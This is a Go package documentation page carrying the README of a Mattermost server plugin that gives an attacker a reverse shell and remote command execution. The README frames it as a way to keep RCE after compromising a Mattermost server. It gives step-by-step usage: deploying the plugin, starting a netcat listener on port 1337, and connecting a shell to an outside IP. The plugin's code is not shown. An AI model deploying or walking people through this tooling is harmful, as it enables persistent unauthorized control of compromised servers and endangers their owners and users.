root

package module
v0.0.0-...-ee48ff2 Latest Latest
Warning

This package is not in the latest version of its module.

Go to latest
Published: Nov 23, 2022 License: Apache-2.0 Imports: 4 Imported by: 0

README

Mattermost Reverse Shell plugin

This plugin implements a reverse shell as a server plugin. Also, you can execute commands and have the plugin post the stdout, stderr of the command as a message.

Why?

If you compromise a Mattermost server, this is a fun way to have RCE.

Running the plugin

make && make deploy

Then... start a reverse shell listener

nc -lvp 1337

and connect

/shell connect 1.2.3.4 1337

Also, you can execute commands on the server! /shell exec command [args]

Documentation

Index

Constants

This section is empty.

Variables

View Source
var Manifest model.Manifest

Functions

This section is empty.

Types

This section is empty.

Directories

Path Synopsis

Jump to

Keyboard shortcuts

? : This menu
/ : Search site
f or F : Jump to
y or Y : Canonical URL